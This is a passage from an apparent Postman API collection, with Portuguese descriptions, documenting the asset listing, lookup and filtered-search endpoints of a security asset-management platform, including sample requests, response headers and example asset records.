\"5d03b90cc569d5025016e4d3\",\n            \"host_ip\": \"192.168.217.192\",\n            \"host_os\": \"Linux Kernel 3.13 on Ubuntu 14.04 (trusty)\"\n        },\n        {\n            \"hostname\": \"ec2-192-168-207-94.sa-east-1.compute.amazonaws.com\",\n            \"type\": \"HOST\",\n            \"severity\": 0,\n            \"asset_id\": \"5d03b90cc569d5025016e4cf\",\n            \"host_ip\": \"192.168.207.94\",\n            \"host_os\": \"Linux Kernel 4.4 on Ubuntu 16.04 (xenial)\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"APPLICATION\",\n            \"severity\": 2,\n            \"port\": 80,\n            \"asset_id\": \"5cd309a0c569d571d3afcd7f\",\n            \"app_url\": \"http://teste.com.br\",\n            \"app_credentials\": \"admin/admin\",\n            \"app_description\": \"Web app description\"\n        },\n        {\n            \"type\": \"PERSON\",\n            \"severity\": 0,\n            \"asset_id\": \"5d02c314c569d50143358ec1\",\n            \"person_email\": \"new.person@email.com\",\n            \"person_name\": \"New Person\"\n        },\n        {\n            \"type\": \"PERSON\",\n            \"severity\": 4,\n            \"asset_id\": \"5cfa98f6c569d53dcd073a1a\",\n            \"person_email\": \"name1.surname1@example.com\",\n            \"person_name\": \"Name1 Surname1\"\n        },\n        {\n            \"type\": \"PERSON\",\n            \"severity\": 2,\n            \"asset_id\": \"5cfa98e6c569d53dcd073a05\",\n            \"person_email\": \"name2.surname2@example.com\",\n            \"person_name\": \"Name2 Surname2\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"asset_id\": \"5cc36718c569d57711bf2ec4\",\n            \"process_name\": \"BACEN 4.658\",\n            \"process_description\": \"BACEN 4.658\"\n        },\n        {\n            \"type\": \"CLOUD\",\n            \"severity\": 0,\n            \"asset_id\": \"5ca4fc4ec569d523f821c7ad\",\n            \"cloud_instance_id\": \"i-8ac5d654fdcb3\",\n            \"cloud_name\": \"i-8ac5d654fdcb3\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"CLOUD\",\n            \"severity\": 2,\n            \"asset_id\": \"5ca4fc40c569d523f821c7a1\",\n            \"cloud_provider\": \"AWS\",\n            \"cloud_name\": \"i-4d2c3fb1a5d6efd3\",\n            \"cloud_instance_id\": \"i-4d2c3fb1a5d6efd3\"\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 10,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"totalPages\": 154,\n    \"totalElements\": 1532,\n    \"last\": false,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 10,\n    \"size\": 10,\n    \"number\": 0\n}"}],"_postman_id":"b8983ed4-d4ba-41d1-ade1-2ef4b36198f1"},{"name":"Asset by ID","id":"eb24b31b-9086-470f-8c78-55f3bd20ad4b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"noauth","isInherited":false},"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v2/assets/<asset_id>","description":"<p>Esse <em>endpoint</em> permite recuperar um único Ativo, especificando seu ID. Se nenhum Ativo com o ID especificado for encontrado, o servidor responderá com o código \"404: Not Found\".</p>\n","urlObject":{"protocol":"https","path":["api","v2","assets","<asset_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"5d266ac3-968e-41e6-8180-d977d5286b19","name":"Try to get wrong Asset","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://subdomain.gat.digital/api/v1/assets/5d03b91cc569d50250100000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 17:25:09 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0fdg1rsirf2r82in7f7btojf3752.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node012u92389kujd91huxbvyrc9q6l753.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=3caab602-be42-40d1-8ec5-d7184c3ef949;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node012u92389kujd91huxbvyrc9q6l753.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"3caab602-be42-40d1-8ec5-d7184c3ef949","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"946f53b3-6208-4b1b-a790-af1aa754a4d3","name":"Get an Asset","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://subdomain.gat.digital/api/v1/assets/5d03b90cc569d5025016e4d5"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 17:23:23 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node012c2vmgwv3880tq470qkzd55n747.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=500b05b3-15c1-4d2a-a6b7-9ca166820faf;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node012c2vmgwv3880tq470qkzd55n747.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"500b05b3-15c1-4d2a-a6b7-9ca166820faf","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"hostname\": \"ec2-192-168-79-154.sa-east-1.compute.amazonaws.com\",\n    \"type\": \"HOST\",\n    \"severity\": 0,\n    \"asset_id\": \"5d03b90cc569d5025016e4d5\",\n    \"host_ip\": \"192.168.79.154\",\n    \"host_os\": \"Linux Kernel 3.13 on Ubuntu 14.04 (trusty)\"\n}"}],"_postman_id":"eb24b31b-9086-470f-8c78-55f3bd20ad4b"},{"name":"Search Asset with given filter","id":"d327c0be-d761-40f9-b720-2ce4c20d3c49","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"asset_id","value":"List<String>","description":"<p>Lista de ID de Ativos.</p>\n","type":"text"},{"key":"key","value":"List<String>","description":"<p>Lista de Key de Ativos.</p>\n","type":"text"},{"key":"type","value":"List<String>","description":"<p>\"HOST\", \"APPLICATION\", \"COMPANY\", \"CLOUD\", \"PERSON\", \"PROCESS\" ou \"OTHERS\".</p>\n","type":"text"},{"key":"tags","value":"List<String>","description":"<p>Lista de Tags.</p>\n","type":"text"},{"key":"severity","value":"List<Int>","description":"<p>Lista de números inteiros de 0 até 4.</p>\n","type":"text"},{"key":"score","value":"Object","description":"<p>Objeto contendo \"operator\" e \"values\" como mostrado abaixo.</p>\n","type":"text"},{"key":"score.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\" ou \"btw\" (between).</p>\n","type":"text"},{"key":"score.values","value":"List<Double>","description":"<p>Uma lista de 2 valores de score.</p>\n","type":"text"},{"key":"creation_date","value":"Object","description":"<p>Objeto contendo \"numberOfDays\", \"future\", \"moreThan\", \"initDate\", \"finalDate\", \"operator\" e \"values\" como mostrado abaixo.</p>\n","type":"text"},{"key":"creation_date.numberOfDays","value":"Int","description":"<p>Número de dias entre a data atual e a data do cadastro do Ativo.</p>\n","type":"text"},{"key":"creation_date.moreThan","value":"Bool","description":"<p>\"Maior que\". Dependendo do \"numberOfDays\".</p>\n","type":"text"},{"key":"creation_date.future","value":"Bool","description":"<p>Adiciona ou subtrai a quantidade de dias do campo \"numberOfDays\". Dependendo do \"moraThan\" e do \"numberOfDays\".</p>\n","type":"text"},{"key":"creation_date.initDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"creation_date.finalDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"creation_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\" ou \"btw\" (between).</p>\n","type":"text"},{"key":"creation_date.values","value":"List<String>","description":"<p>Uma lista de 1 ou 2 datas, dependendo do \"operator\". O formato da data é: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"last_seen","value":"Object","description":"<p>Objeto contendo \"numberOfDays\", \"future\", \"moreThan\", \"initDate\", \"finalDate\", \"operator\" e \"values\" como mostrado abaixo.</p>\n","type":"text"},{"key":"last_seen.numberOfDays","value":"Int","description":"<p>Número de dias entre a data atual e a data do cadastro do Ativo.</p>\n","type":"text"},{"key":"last_seen.moreThan","value":"Bool","description":"<p>\"Maior que\". Dependendo do \"numberOfDays\".</p>\n","type":"text"},{"key":"last_seen.future","value":"Bool","description":"<p>Adiciona ou subtrai a quantidade de dias do campo \"numberOfDays\". Dependendo do \"moraThan\" e do \"numberOfDays\".</p>\n","type":"text"},{"key":"last_seen.initDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"last_seen.finalDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"last_seen.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\" ou \"btw\" (between).</p>\n","type":"text"},{"key":"last_seen.values","value":"List<String>","description":"<p>Uma lista contendo 1 ou 2 datas, dependendo do \"operator\". O formato da data é: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"asset_group","value":"List<String>","description":"<p>Lista de ID de Assets Group.</p>\n","type":"text"},{"key":"host","value":"Object","description":"<p>[opcional se type==HOST] Objeto contendo \"ip_range\", \"type\", \"hostname\", \"os\", \"os_version\", \"kernel\", \"netbios\", \"mac_address\", \"patch_name\", \"patch_release_date\", \"patch_apply_date\", \"service_name\", \"service_version\", \"service_port\" e \"service_status\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.ip_range","value":"List<String>","description":"<p>Lista de IPs de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.type","value":"List<String>","description":"<p>Lista de tipos de host de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.hostname","value":"List<String>","description":"<p>Lista de Hostnames de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.os","value":"List<String>","description":"<p>Lista de Sistemas Operacionais de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.os_version","value":"List<String>","description":"<p>Lista de versões dos Sistemas Operacionais de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.kernel","value":"List<String>","description":"<p>Lista de versões do Kernel de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.netbios","value":"List<String>","description":"<p>Lista de Netbios de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.mac_address","value":"List<String>","description":"<p>Lista de endereços MAC de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.patch_name","value":"List<String>","description":"<p>Lista de Patch Name de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.patch_release_date","value":"Object","description":"<p>Objeto contendo \"numberOfDays\", \"future\", \"moreThan\", \"initDate\", \"finalDate\", \"operator\" e \"values\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.patch_release_date.numberOfDays","value":"Int","description":"<p>Número de dias entre a data atual e a data do cadastro do Ativo.</p>\n","type":"text"},{"key":"host.patch_release_date.moreThan","value":"Bool","description":"<p>\"Maior que\". Dependendo do \"numberOfDays\".</p>\n","type":"text"},{"key":"host.patch_release_date.future","value":"Bool","description":"<p>Adiciona ou subtrai a quantidade de dias do campo \"numberOfDays\". Dependendo do \"moraThan\" e do \"numberOfDays\".</p>\n","type":"text"},{"key":"host.patch_release_date.initDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.patch_release_date.finalDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.patch_release_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\" ou \"btw\" (between).</p>\n","type":"text"},{"key":"host.patch_release_date.values","value":"List<String>","description":"<p>Uma lista de 1 ou 2 datas, dependendo do \"operator\". O formato da data é: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.patch_apply_date","value":"Object","description":"<p>Objeto contendo \"numberOfDays\", \"future\", \"moreThan\", \"initDate\", \"finalDate\", \"operator\" e \"values\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.patch_apply_date.numberOfDays","value":"Int","description":"<p>Número de dias entre a data atual e a data do cadastro do Ativo.</p>\n","type":"text"},{"key":"host.patch_apply_date.moreThan","value":"Bool","description":"<p>\"Maior que\". Dependendo do \"numberOfDays\".</p>\n","type":"text"},{"key":"host.patch_apply_date.future","value":"Bool","description":"<p>Adiciona ou subtrai a quantidade de dias do campo \"numberOfDays\". Dependendo do \"moraThan\" e do \"numberOfDays\".</p>\n","type":"text"},{"key":"host.patch_apply_date.initDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.patch_apply_date.finalDate","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.patch_apply_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\" ou \"btw\" (between).</p>\n","type":"text"},{"key":"host.patch_apply_date.values","value":"String","description":"<p>Uma lista de 1 ou 2 datas, dependendo do \"operator\". O formato da data é: \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.service_name","value":"List<String>","description":"<p>Lista de Service Names de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.service_version","value":"List<String>","description":"<p>Lista de Service Version de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.service_port","value":"List<Int>","description":"<p>Lista de Service Ports de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"host.service_status","value":"List<String>","description":"<p>Lista de Service Status de Ativos do tipo HOST.</p>\n","type":"text"},{"key":"app","value":"Object","description":"<p>[opcional se type==APPLICATION] Objeto contendo \"port\", \"backend_name\", \"backend_version\", \"frontend_name\", \"frontend_version\", \"database_name\", \"database_version\" e \"visibility\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.port","value":"List<Int>","description":"<p>Lista de Portas de Ativos do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.backend_name","value":"List<String>","description":"<p>Lista de nomes dos Backend de Ativos do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.backend_version","value":"List<String>","description":"<p>Lista de versões dos Backend de Ativos do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.frontend_name","value":"List<String>","description":"<p>Lista de nomes dos Frontend de Ativos do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.frontend_version","value":"List<String>","description":"<p>Lista de versões dos Frontend de Ativos do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.database_name","value":"List<String>","description":"<p>Lista de nomes dos Bancos de Dados de Ativos do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.database_version","value":"List<String>","description":"<p>Lista de versões dos Bancos de Dados de Ativos do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.visibility","value":"String","description":"<p>\"INTERNAL\" ou \"EXTERNAL\".</p>\n","type":"text"},{"key":"cloud","value":"Object","description":"<p>[opcional se type==CLOUD] Objeto contendo \"instance_id\", \"provider\", \"instance_type\", \"region\", \"image_id\", \"internal_ip_address\", \"public_ip_address\" e \"security_groups\" como mostrado abaixo.</p>\n","type":"text"},{"key":"cloud.instance_id","value":"List<String>","description":"<p>Lista de Instance IDs de Ativos do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.provider","value":"List<String>","description":"<p>Lista de Providers de Ativos do tipo CLOUD. Podem ser: \"AWS\", \"AZURE\", \"DOCKER\" ou \"DHCP\".</p>\n","type":"text"},{"key":"cloud.instance_type","value":"List<String>","description":"<p>Lista de Instance Types de Ativos do tipo CLOUD. Exemplo: \"EC2\".</p>\n","type":"text"},{"key":"cloud.region","value":"List<String>","description":"<p>Lista de Regiões de Ativos do tipo CLOUD. Exemplo: \"us-west-2\".</p>\n","type":"text"},{"key":"cloud.image_id","value":"List<String>","description":"<p>Lista de Image IDs de Ativos do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.internal_ip_addresses","value":"List<String>","description":"<p>Lista de IPs internos de Ativos do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.public_ip_address","value":"List<String>","description":"<p>Lista de IPs externos de Ativos do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.security_groups","value":"List<String>","description":"<p>Lista de Security Groups de Ativos do tipo CLOUD.</p>\n","type":"text"},{"key":"company","value":"Object","description":"<p>[opcional se type==COMPANY] Objeto contendo \"domains\", \"subdomains\", \"email_addresses\", \"phone_number\", \"responsible_name\", \"responsible_email\" e \"doc_number\" como mostrado abaixo.</p>\n","type":"text"},{"key":"company.domains","value":"List<String>","description":"<p>Lista de Domínios de Ativos do tipo COMPANY.</p>\n","type":"text"},{"key":"company.subdomains","value":"List<String>","description":"<p>Lista de Subdomínios de Ativos do tipo COMPANY.</p>\n","type":"text"},{"key":"company.email_addresses","value":"List<String>","description":"<p>Lista de endereços de Email de Ativos do tipo Company of COMPANY.</p>\n","type":"text"},{"key":"company.phone_number","value":"List<String>","description":"<p>Lista de números de Telefone de Ativos do tipo COMPANY.</p>\n","type":"text"},{"key":"company.responsible_name","value":"List<String>","description":"<p>Lista de nomes de Responsáveis de Ativos do tipo COMPANY.</p>\n","type":"text"},{"key":"company.responsible_email","value":"List<String>","description":"<p>Lista de Emails de Responsáveis de Ativos do tipo COMPANY.</p>\n","type":"text"},{"key":"company.doc_number","value":"List<String>","description":"<p>Lista de Número de Documentos de Ativos do tipo COMPANY.</p>\n","type":"text"},{"key":"person","value":"Object","description":"<p>[opcional se type==PERSON] Objeto contendo \"first_name\", \"last_name\", \"doc_number\", \"phone_number\", \"social_network_name\", \"city\", \"state\" e \"country\" como mostardo abaixo.</p>\n","type":"text"},{"key":"person.first_name","value":"List<String>","description":"<p>Lista de primeiros nomes de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"person.last_name","value":"List<String>","description":"<p>Lista de sobrenomes de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"person.doc_number","value":"List<String>","description":"<p>Lista de Número de Documentos de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"person.phone_number","value":"List<String>","description":"<p>Lista de números de Telefone de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"person.social_network_name","value":"List<String>","description":"<p>Lista de nomes de Redes Sociais de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"person.city","value":"List<String>","description":"<p>Lista de Cidades de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"person.state","value":"List<String>","description":"<p>Lista de Estados de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"person.country","value":"List<String>","description":"<p>Lista de Países de Ativos do tipo PERSON.</p>\n","type":"text"},{"key":"process","value":"Object","description":"<p>[opcional se type==PROCESS] Objeto contendo \"key\", \"description\", \"severity\".</p>\n","type":"text"},{"key":"others","value":"Object","description":"<p>[opcional se type==OTHERS] Objeto contendo \"key\", \"description\", \"severity\", \"tags\", asset_group\".</p>\n","type":"text"},{"key":"others.key","value":"String","description":"<p>Nome do Ativo do tipo OTHERS.</p>\n","type":"text","disabled":true},{"key":"","value":"","type":"text","disabled":true}]},"url":"https://<instance>/api/v2/assets?size=30&page=0","description":"<p>Esse <em>endpoint</em> permite buscar determinados Ativos com base em um filtro especificado. Portanto, usando: \"type:[\"HOST\", \"APPLICATION\"]\" irá recuperar todos os Ativos do tipo HOST e APPLICATION. Você também pode especificar campos de um determinado tipo de Ativo para uma busca mais precisa, então, utilizando: \"type:[\"APPLICATION\"], app:{\"port\":[8080, 5432]}\", irá recuperar todos os Ativos do tipo APPLICATION que utilizam as portas 8080 e 5432. Utiliza-se paginação com os parâmetros <strong>size</strong> e <strong>page</strong>. Se os parâmetros não forem especificados, <strong>size</strong> será 30 e <strong>page</strong> será 0 por padrão.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","assets"],"host":["<instance>"],"query":[{"description":{"content":"<p>[opcional] Quantos Ativos por página. Por padrão é 30. O número máximo é 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[opcional] Qual página buscar.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"449f59af-648d-4b4b-b8c3-73eeb76633e3","name":"Didn't find any Asset","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"asset_id\": [\"5c06b3ed5ced7f075e0a3ef1\"]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 13:44:13 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0v1gepjoihjd01dzdzunzuhsu62650.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=515d8fe2-d43f-425b-a64b-73f1b1bfd4fb;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0v1gepjoihjd01dzdzunzuhsu62650.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"515d8fe2-d43f-425b-a64b-73f1b1bfd4fb","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"df49f26b-2826-4f53-9545-4b86755b6ec9","name":"Send wrong type value to a parameter","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"app_url\": \"http://teste.com.br\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Fri, 14 Jun 2019 18:37:56 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node013h8at5q92lmz37n61vpq2e5l1125.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP 